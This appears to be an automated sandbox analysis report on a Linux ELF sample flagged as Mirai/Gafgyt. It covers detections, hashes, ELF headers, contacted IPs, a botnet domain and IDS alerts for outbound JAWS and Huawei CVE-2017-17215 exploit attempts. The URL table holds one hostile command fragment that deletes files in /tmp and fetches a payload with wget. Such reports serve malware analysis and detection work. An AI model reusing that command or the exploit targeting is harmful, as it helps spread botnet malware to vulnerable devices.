          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging1
          Ingress Tool Transfer
          Scheduled TransferData Encrypted for Impact
          No configs have been found
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Number of created Files
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1567835 Sample: x86_64.elf Startdate: 03/12/2024 Architecture: LINUX Score: 100 20 scamanje.stresserit.pro 2->20 22 197.187.29.146 airtel-tz-asTZ Tanzania United Republic of 2->22 24 99 other IPs or domains 2->24 26 Suricata IDS alerts for network traffic 2->26 28 Malicious sample detected (through community Yara rule) 2->28 30 Antivirus / Scanner detection for submitted sample 2->30 32 6 other signatures 2->32 8 x86_64.elf 2->8         started        signatures3 process4 process5 10 x86_64.elf 8->10         started        process6 12 x86_64.elf 10->12         started        14 x86_64.elf 10->14         started        16 x86_64.elf 10->16         started        18 x86_64.elf 10->18         started       

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          x86_64.elf76%ReversingLabsLinux.Trojan.Mirai
          x86_64.elf100%AviraEXP/ELF.Gafgyt.T
          x86_64.elf100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          scamanje.stresserit.pro
          unknown
          unknowntrue
            unknown
            NameMaliciousAntivirus DetectionReputation
            http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+true
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://schemas.xmlsoap.org/soap/encoding/x86_64.elffalse
              high
              http://schemas.xmlsoap.org/soap/envelope/x86_64.elffalse
                high
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                196.211.163.155
                unknownSouth Africa
                3741ISZAfalse
                4.113.231.200
                unknownUnited States
                3356LEVEL3USfalse
                62.10.234.147
                unknownItaly
                8612TISCALI-ITfalse
                41.6.232.115
                unknownSouth Africa
                29975VODACOM-ZAfalse
                53.68.172.53
                unknownGermany
                31399DAIMLER-ASITIGNGlobalNetworkDEfalse
                17.68.111.76
                unknownUnited States
                714APPLE-ENGINEERINGUSfalse
                130.99.153.145
                unknownUnited States
                203CENTURYLINK-LEGACY-LVLT-203USfalse
                104.32.81.112
                unknownUnited States
                20001TWC-20001-PACWESTUSfalse
                71.25.178.51
                unknownUnited States
                7922COMCAST-7922USfalse
                185.21.51.74
                unknownFrance
                199327BLUECARSHARINGFRfalse
                209.86.139.208
                unknownUnited States
                7029WINDSTREAMUSfalse
                13.64.92.50
                unknownUnited States
                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                219.67.240.159
                unknownJapan4725ODNSoftBankMobileCorpJPfalse
                126.141.198.239
                unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                172.115.197.150
                unknownUnited States
                20001TWC-20001-PACWESTUSfalse
                68.14.221.179
                unknownUnited States
                22773ASN-CXA-ALL-CCI-22773-RDCUSfalse
                177.18.229.228
                unknownBrazil
                18881TELEFONICABRASILSABRfalse
                109.70.39.189
                unknownSpain
                16371ACENS_ASSpainHostinghousingandVPNservicesESfalse
                197.131.5.112
                unknownMorocco
                6713IAM-ASMAfalse
                41.51.170.21
                unknownSouth Africa
                37168CELL-CZAfalse
                154.113.68.242
                unknownNigeria
                37282MAINONENGfalse
                41.110.52.206
                unknownAlgeria
                36947ALGTEL-ASDZfalse
                139.57.230.32
                unknownCanada
                16475BROCKUCAfalse
                99.69.27.197
                unknownUnited States
                7018ATT-INTERNET4USfalse
                139.86.12.194
                unknownAustralia
                45213USQNET-AS-APUniversityofSouthernQueenslandAUfalse
                41.145.120.181
                unknownSouth Africa
                5713SAIX-NETZAfalse
                156.114.21.46
                unknownNetherlands
                13639ING-AMERICAS-WHOLESALEUSfalse
                156.57.94.233
                unknownCanada
                855CANET-ASN-4CAfalse
                157.249.142.122
                unknownNorway
                224UNINETTUNINETTTheNorwegianUniversityResearchNetworkfalse
                210.93.55.204
                unknownKorea Republic of
                23668KPU-AS-KRKOREAPOLYTECHNICUNIVERSITYKRfalse
                150.203.163.11
                unknownAustralia
                7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNefalse
                164.165.70.198
                unknownUnited States
                54885STATE-OF-IDAHO-SECONDARY-ASNUSfalse
                192.106.159.111
                unknownItaly
                1267ASN-WINDTREIUNETEUfalse
                12.82.79.27
                unknownUnited States
                7018ATT-INTERNET4USfalse
                174.189.213.29
                unknownUnited States
                7922COMCAST-7922USfalse
                202.65.140.95
                unknownIndia
                18229CTRLS-AS-INCtrlSDatacentersLtdINfalse
                197.28.210.168
                unknownTunisia
                37492ORANGE-TNfalse
                95.221.2.218
                unknownRussian Federation
                12714TI-ASMoscowRussiaRUfalse
                195.180.96.254
                unknownGermany
                4589EASYNETEasynetGlobalServicesEUfalse
                81.25.253.97
                unknownEstonia
                51504TELSETEEfalse
                175.210.183.51
                unknownKorea Republic of
                4766KIXS-AS-KRKoreaTelecomKRfalse
                213.81.197.68
                unknownSlovakia (SLOVAK Republic)
                6855SK-TELEKOMSKfalse
                203.78.33.154
                unknownHong Kong
                17924SMARTONE-MB-AS-APSmarToneMobileCommunicationsLtdHKfalse
                96.242.159.65
                unknownUnited States
                701UUNETUSfalse
                41.94.138.92
                unknownMozambique
                327700MoRENetMZfalse
                200.255.254.150
                unknownBrazil
                4230CLAROSABRfalse
                131.244.237.197
                unknownAustralia
                24436UQ-AS-APUniversityofQueenslandAUfalse
                165.9.12.130
                unknownSouth Africa
                5713SAIX-NETZAfalse
                14.200.162.185
                unknownAustralia
                7545TPG-INTERNET-APTPGTelecomLimitedAUfalse
                104.64.19.52
                unknownUnited States
                16625AKAMAI-ASUSfalse
                108.18.118.11
                unknownUnited States
                701UUNETUSfalse
                106.46.246.71
                unknownChina
                4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                1.197.24.113
                unknownChina
                4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                120.112.105.241
                unknownTaiwan; Republic of China (ROC)
                17716NTU-TWNationalTaiwanUniversityTWfalse
                197.93.144.192
                unknownSouth Africa
                10474OPTINETZAfalse
                50.217.217.153
                unknownUnited States
                7922COMCAST-7922USfalse
                120.56.135.50
                unknownIndia
                17813MTNL-APMahanagarTelephoneNigamLimitedINfalse
                171.250.205.217
                unknownViet Nam
                7552VIETEL-AS-APViettelGroupVNfalse
                197.136.224.54
                unknownKenya
                36914KENET-ASKEfalse
                156.72.152.98
                unknownUnited States
                29975VODACOM-ZAfalse
                142.93.19.254
                unknownUnited States
                14061DIGITALOCEAN-ASNUSfalse
                20.25.221.8
                unknownUnited States
                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                42.161.44.222
                unknownChina
                4249LILLY-ASUSfalse
                54.118.15.136
                unknownUnited States
                16509AMAZON-02USfalse
                197.187.29.146
                unknownTanzania United Republic of
                37133airtel-tz-asTZfalse
                41.190.177.146
                unknownunknown
                36974AFNET-ASCIfalse
                201.77.56.41
                unknownBrazil
                28583RuralWebTelecomunicacoesLtdaBRfalse
                156.8.126.107
                unknownSouth Africa
                3741ISZAfalse
                41.91.211.137
                unknownEgypt
                37069MOBINILEGfalse
                70.177.73.17
                unknownUnited States
                22773ASN-CXA-ALL-CCI-22773-RDCUSfalse
                27.231.94.50
                unknownJapan9605DOCOMONTTDOCOMOINCJPfalse
                32.80.11.53
                unknownUnited States
                2686ATGS-MMD-ASUSfalse
                179.48.192.42
                unknownunknown
                3816COLOMBIATELECOMUNICACIONESSAESPCOfalse
                82.191.195.15
                unknownItaly
                3269ASN-IBSNAZITfalse
                17.88.236.29
                unknownUnited States
                714APPLE-ENGINEERINGUSfalse
                168.198.248.31
                unknownAustralia
                264757GALLOVICENTEARfalse
                40.178.90.88
                unknownUnited States
                4249LILLY-ASUSfalse
                52.145.207.242
                unknownUnited States
                393347IFNCOUSfalse
                220.201.190.33
                unknownChina
                4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                84.14.66.14
                unknownFrance
                8220COLTCOLTTechnologyServicesGroupLimitedGBfalse
                174.83.251.12
                unknownUnited States
                20115CHARTER-20115USfalse
                176.174.244.135
                unknownFrance
                5410BOUYGTEL-ISPFRfalse
                103.226.62.168
                unknownChina
                59273KLN-AS-IDPTKOMUNIKASILINTASNUSAIDfalse
                159.116.117.246
                unknownUnited States
                53280PROMEDICAUSfalse
                62.161.114.201
                unknownFrance
                3215FranceTelecom-OrangeFRfalse
                41.10.179.225
                unknownSouth Africa
                29975VODACOM-ZAfalse
                101.211.111.146
                unknownIndia
                58519CHINATELECOM-CTCLOUDCloudComputingCorporationCNfalse
                13.194.189.49
                unknownUnited States
                7018ATT-INTERNET4USfalse
                71.61.125.147
                unknownUnited States
                7922COMCAST-7922USfalse
                116.164.156.17
                unknownChina
                4847CNIX-APChinaNetworksInter-ExchangeCNfalse
                77.224.196.208
                unknownSpain
                12430VODAFONE_ESESfalse
                197.90.74.26
                unknownSouth Africa
                10474OPTINETZAfalse
                191.15.88.0
                unknownBrazil
                26599TELEFONICABRASILSABRfalse
                110.161.133.165
                unknownJapan9605DOCOMONTTDOCOMOINCJPfalse
                57.200.127.173
                unknownBelgium
                2686ATGS-MMD-ASUSfalse
                78.6.58.102
                unknownItaly
                8968BT-ITALIAITfalse
                179.172.174.15
                unknownBrazil
                26599TELEFONICABRASILSABRfalse
                63.226.219.105
                unknownUnited States
                209CENTURYLINK-US-LEGACY-QWESTUSfalse
                57.166.199.187
                unknownBelgium
                2686ATGS-MMD-ASUSfalse
                60.166.11.165
                unknownChina
                4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                196.211.163.155nklarm5.elfGet hashmaliciousUnknownBrowse
                  126.141.198.239na.elfGet hashmaliciousMiraiBrowse
                    iHdfLpj7dF.elfGet hashmaliciousMiraiBrowse
                      172.115.197.150tHUFsPJKEsGet hashmaliciousMiraiBrowse
                        bxH7w08kANGet hashmaliciousMiraiBrowse
                          Tsunami.armGet hashmaliciousMiraiBrowse
                            4.113.231.20095.214.27.186-x86-2024-07-07T07_12_12.elfGet hashmaliciousMiraiBrowse
                              62.10.234.147CfLfQKoCG8Get hashmaliciousMiraiBrowse
                                185.21.51.74rXusqWlMQY.elfGet hashmaliciousMiraiBrowse
                                  42dIZtC5ePGet hashmaliciousMiraiBrowse
                                    Hilix.armGet hashmaliciousMiraiBrowse
                                      41.6.232.115n26s9HHKlX.elfGet hashmaliciousMirai, MoobotBrowse
                                        5yN9bgKBQh.elfGet hashmaliciousMirai, MoobotBrowse
                                          x86.elfGet hashmaliciousMiraiBrowse
                                            Z3W7W8QFB8.elfGet hashmaliciousMirai, MoobotBrowse
                                              219.67.240.159gm4I5PGtrj.elfGet hashmaliciousMiraiBrowse
                                                No context
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                VODACOM-ZAsh4.elfGet hashmaliciousMiraiBrowse
                                                • 156.141.254.169
                                                arm7.elfGet hashmaliciousMiraiBrowse
                                                • 156.133.239.120
                                                mips.elfGet hashmaliciousMiraiBrowse
                                                • 156.21.96.236
                                                nsharm7.elfGet hashmaliciousMiraiBrowse
                                                • 41.8.13.79
                                                arm.elfGet hashmaliciousMiraiBrowse
                                                • 41.14.214.97
                                                Nowe zam#U00f3wienie - 0072291855.pdf (243KB).com.exeGet hashmaliciousQuasarBrowse
                                                • 156.0.0.7
                                                sora.mips.elfGet hashmaliciousMiraiBrowse
                                                • 156.24.5.78
                                                la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                • 41.28.9.178
                                                la.bot.arm7.elfGet hashmaliciousMiraiBrowse
                                                • 41.22.92.99
                                                la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                                • 105.250.4.122
                                                TISCALI-ITsora.ppc.elfGet hashmaliciousMiraiBrowse
                                                • 94.35.224.52
                                                x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 94.34.129.113
                                                botnet.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                • 94.37.65.209
                                                mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                • 84.220.146.189
                                                arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                • 78.13.230.214
                                                i586.elfGet hashmaliciousUnknownBrowse
                                                • 94.35.182.9
                                                spc.elfGet hashmaliciousMiraiBrowse
                                                • 94.35.125.208
                                                loligang.mpsl-20241128-1536.elfGet hashmaliciousMiraiBrowse
                                                • 84.223.139.195
                                                botx.arm6.elfGet hashmaliciousMiraiBrowse
                                                • 84.223.104.18
                                                arm7.elfGet hashmaliciousUnknownBrowse
                                                • 94.35.24.177
                                                LEVEL3USsh4.elfGet hashmaliciousMiraiBrowse
                                                • 9.198.170.81
                                                teste.arm7.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                • 67.201.96.165
                                                teste.arm.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                                • 206.32.212.211
                                                arm.elfGet hashmaliciousMiraiBrowse
                                                • 4.252.228.122
                                                xd.mpsl.elfGet hashmaliciousMiraiBrowse
                                                • 8.125.123.88
                                                xd.x86.elfGet hashmaliciousMiraiBrowse
                                                • 4.9.83.120
                                                xd.mips.elfGet hashmaliciousMiraiBrowse
                                                • 4.215.84.193
                                                xd.ppc.elfGet hashmaliciousMiraiBrowse
                                                • 4.203.47.32
                                                xd.arm.elfGet hashmaliciousMiraiBrowse
                                                • 8.96.5.43
                                                xd.sh4.elfGet hashmaliciousMiraiBrowse
                                                • 9.99.10.82
                                                ISZAteste.arm7.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                • 196.36.23.103
                                                arm.elfGet hashmaliciousMiraiBrowse
                                                • 156.8.250.180
                                                sora.mips.elfGet hashmaliciousMiraiBrowse
                                                • 196.215.73.186
                                                la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                • 197.96.198.139
                                                mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 196.33.170.223
                                                arm5.nn-20241201-1515.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 196.35.53.141
                                                x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 196.23.251.199
                                                x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 196.210.99.84
                                                hmips.elfGet hashmaliciousMiraiBrowse
                                                • 197.103.64.235
                                                mpsl.elfGet hashmaliciousMiraiBrowse
                                                • 197.101.109.102
                                                No context
                                                No context
                                                No created / dropped files found
                                                File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
                                                Entropy (8bit):6.235180081341456
                                                TrID:
                                                • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                File name:x86_64.elf
                                                File size:68'352 bytes
                                                MD5:88660446811d50c52341472f9b03d870
                                                SHA1:bc8c0a5be47d1538a1504aded3f9fdffaabe3b6f
                                                SHA256:011c4d82c6f391669c979bb51cabe5815e14f370e96e4492d298ad16f510b73d
                                                SHA512:15a1bc29f9e2f6c97b498edc751d13720ea7b643f48e7745fa3b10194942294d04556e6a963b3075c6c402c11aead80bf564696f71180a69d10c629055da7cac
                                                SSDEEP:1536:AQqMYLd31JuGGCao6GRnBkmnz8o16Qj7AT4vpN3:VqMYrJdvaopRnuE16QjI4v
                                                TLSH:8D634B83798184FDC55CC27457BB7A36D82234BD0339B2D637C8BF275D0AE605E2AA85
                                                File Content Preview:.ELF..............>.......@.....@...................@.8...@.......................@.......@...............................................Q.......Q.....8.......`...............Q.td....................................................H...._........H........

                                                ELF header

                                                Class:ELF64
                                                Data:2's complement, little endian
                                                Version:1 (current)
                                                Machine:Advanced Micro Devices X86-64
                                                Version Number:0x1
                                                Type:EXEC (Executable file)
                                                OS/ABI:UNIX - System V
                                                ABI Version:0
                                                Entry Point Address:0x400194
                                                Flags:0x0
                                                ELF Header Size:64
                                                Program Header Offset:64
                                                Program Header Size:56
                                                Number of Program Headers:3
                                                Section Header Offset:67712
                                                Section Header Size:64
                                                Number of Section Headers:10
                                                Header String Table Index:9
                                                NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                NULL0x00x00x00x00x0000
                                                .initPROGBITS0x4000e80xe80x130x00x6AX001
                                                .textPROGBITS0x4001000x1000xeb260x00x6AX0016
                                                .finiPROGBITS0x40ec260xec260xe0x00x6AX001
                                                .rodataPROGBITS0x40ec400xec400x19c00x00x2A0032
                                                .ctorsPROGBITS0x5106080x106080x100x00x3WA008
                                                .dtorsPROGBITS0x5106180x106180x100x00x3WA008
                                                .dataPROGBITS0x5106400x106400x2000x00x3WA0032
                                                .bssNOBITS0x5108400x108400xe280x00x3WA0032
                                                .shstrtabSTRTAB0x00x108400x3e0x00x0001
                                                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                LOAD0x00x4000000x4000000x106000x106006.28150x5R E0x100000.init .text .fini .rodata
                                                LOAD0x106080x5106080x5106080x2380x10602.89840x6RW 0x100000.ctors .dtors .data .bss
                                                GNU_STACK0x00x00x00x00x00.00000x6RW 0x8
                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2024-12-03T22:16:51.481968+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336100148.77.50.20680TCP
                                                2024-12-03T22:16:51.481968+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2336100148.77.50.20680TCP
                                                2024-12-03T22:16:51.910119+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350814189.63.67.24280TCP
                                                2024-12-03T22:16:51.910119+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350814189.63.67.24280TCP
                                                2024-12-03T22:16:51.953564+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356390201.216.93.11880TCP
                                                2024-12-03T22:16:51.953564+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356390201.216.93.11880TCP
                                                2024-12-03T22:16:52.840666+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338588143.95.246.7480TCP
                                                2024-12-03T22:16:52.840666+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338588143.95.246.7480TCP
                                                2024-12-03T22:16:54.435640+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234702458.233.196.22080TCP
                                                2024-12-03T22:16:54.435640+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234702458.233.196.22080TCP
                                                2024-12-03T22:16:57.701713+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336064197.4.255.17137215TCP
                                                2024-12-03T22:17:02.741173+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233866441.71.190.20337215TCP
                                                2024-12-03T22:17:02.899626+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2347242156.231.61.4637215TCP
                                                2024-12-03T22:17:03.104975+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235884441.215.18.13437215TCP
                                                2024-12-03T22:17:05.674697+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338202195.66.25.12580TCP
                                                2024-12-03T22:17:05.674697+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338202195.66.25.12580TCP
                                                2024-12-03T22:17:05.762128+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357118103.68.228.3880TCP
                                                2024-12-03T22:17:05.762128+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357118103.68.228.3880TCP
                                                2024-12-03T22:17:05.982297+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352546156.229.62.23737215TCP
                                                2024-12-03T22:17:06.318955+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352484197.7.168.11937215TCP
                                                2024-12-03T22:17:09.420536+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359658156.21.203.12237215TCP
                                                2024-12-03T22:17:09.603237+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338366156.41.220.18837215TCP
                                                2024-12-03T22:17:09.603665+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351230197.137.137.13237215TCP
                                                2024-12-03T22:17:10.452402+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234400293.134.211.18780TCP
                                                2024-12-03T22:17:10.452402+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234400293.134.211.18780TCP
                                                2024-12-03T22:17:10.461269+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233455444.97.239.5880TCP
                                                2024-12-03T22:17:10.461269+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233455444.97.239.5880TCP
                                                2024-12-03T22:17:10.469901+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350084141.23.106.5880TCP
                                                2024-12-03T22:17:10.469901+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350084141.23.106.5880TCP
                                                2024-12-03T22:17:10.478714+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235480269.105.106.180TCP
                                                2024-12-03T22:17:10.478714+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235480269.105.106.180TCP
                                                2024-12-03T22:17:10.498657+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23513325.50.172.10280TCP
                                                2024-12-03T22:17:10.498657+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23513325.50.172.10280TCP
                                                2024-12-03T22:17:10.514385+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349430142.163.169.14880TCP
                                                2024-12-03T22:17:10.514385+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349430142.163.169.14880TCP
                                                2024-12-03T22:17:10.514443+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335632217.15.168.2580TCP
                                                2024-12-03T22:17:10.514443+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335632217.15.168.2580TCP
                                                2024-12-03T22:17:10.523664+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235380446.29.80.18280TCP
                                                2024-12-03T22:17:10.523664+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235380446.29.80.18280TCP
                                                2024-12-03T22:17:10.545681+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356994106.125.175.24680TCP
                                                2024-12-03T22:17:10.545681+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356994106.125.175.24680TCP
                                                2024-12-03T22:17:10.555075+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233657853.119.123.1380TCP
                                                2024-12-03T22:17:10.555075+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233657853.119.123.1380TCP
                                                2024-12-03T22:17:10.555321+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341946108.128.143.2180TCP
                                                2024-12-03T22:17:10.555321+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341946108.128.143.2180TCP
                                                2024-12-03T22:17:10.561391+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358412191.107.11.3680TCP
                                                2024-12-03T22:17:10.561391+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2358412191.107.11.3680TCP
                                                2024-12-03T22:17:10.570463+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235790423.13.227.18080TCP
                                                2024-12-03T22:17:10.570463+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235790423.13.227.18080TCP
                                                2024-12-03T22:17:10.577047+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358214159.56.174.21180TCP
                                                2024-12-03T22:17:10.577047+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2358214159.56.174.21180TCP
                                                2024-12-03T22:17:10.586263+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338168136.30.197.4280TCP
                                                2024-12-03T22:17:10.586263+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338168136.30.197.4280TCP
                                                2024-12-03T22:17:10.586348+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358950213.10.8.15380TCP
                                                2024-12-03T22:17:10.586348+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2358950213.10.8.15380TCP
                                                2024-12-03T22:17:10.586498+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234885276.65.219.24480TCP
                                                2024-12-03T22:17:10.586498+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234885276.65.219.24480TCP
                                                2024-12-03T22:17:11.243397+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357206193.208.82.8780TCP
                                                2024-12-03T22:17:11.243397+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357206193.208.82.8780TCP
                                                2024-12-03T22:17:11.360450+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348250156.232.91.737215TCP
                                                2024-12-03T22:17:11.389832+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234619659.87.238.4380TCP
                                                2024-12-03T22:17:11.389832+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234619659.87.238.4380TCP
                                                2024-12-03T22:17:11.421161+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354544137.84.118.5580TCP
                                                2024-12-03T22:17:11.421161+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2354544137.84.118.5580TCP
                                                2024-12-03T22:17:11.421600+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342718200.134.217.20080TCP
                                                2024-12-03T22:17:11.421600+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2342718200.134.217.20080TCP
                                                2024-12-03T22:17:11.421775+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235434089.199.198.1180TCP
                                                2024-12-03T22:17:11.421775+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235434089.199.198.1180TCP
                                                2024-12-03T22:17:11.421936+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235948889.148.112.8280TCP
                                                2024-12-03T22:17:11.421936+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235948889.148.112.8280TCP
                                                2024-12-03T22:17:11.422058+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234269886.87.136.3080TCP
                                                2024-12-03T22:17:11.422058+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234269886.87.136.3080TCP
                                                2024-12-03T22:17:11.422251+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233374651.0.21.4280TCP
                                                2024-12-03T22:17:11.422251+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233374651.0.21.4280TCP
                                                2024-12-03T22:17:11.422352+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235574850.18.129.22480TCP
                                                2024-12-03T22:17:11.422352+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235574850.18.129.22480TCP
                                                2024-12-03T22:17:11.422427+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351504120.125.222.8480TCP
                                                2024-12-03T22:17:11.422427+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2351504120.125.222.8480TCP
                                                2024-12-03T22:17:11.422525+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340354177.102.58.16080TCP
                                                2024-12-03T22:17:11.422525+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2340354177.102.58.16080TCP
                                                2024-12-03T22:17:11.430072+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342740126.110.141.4480TCP
                                                2024-12-03T22:17:11.430072+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2342740126.110.141.4480TCP
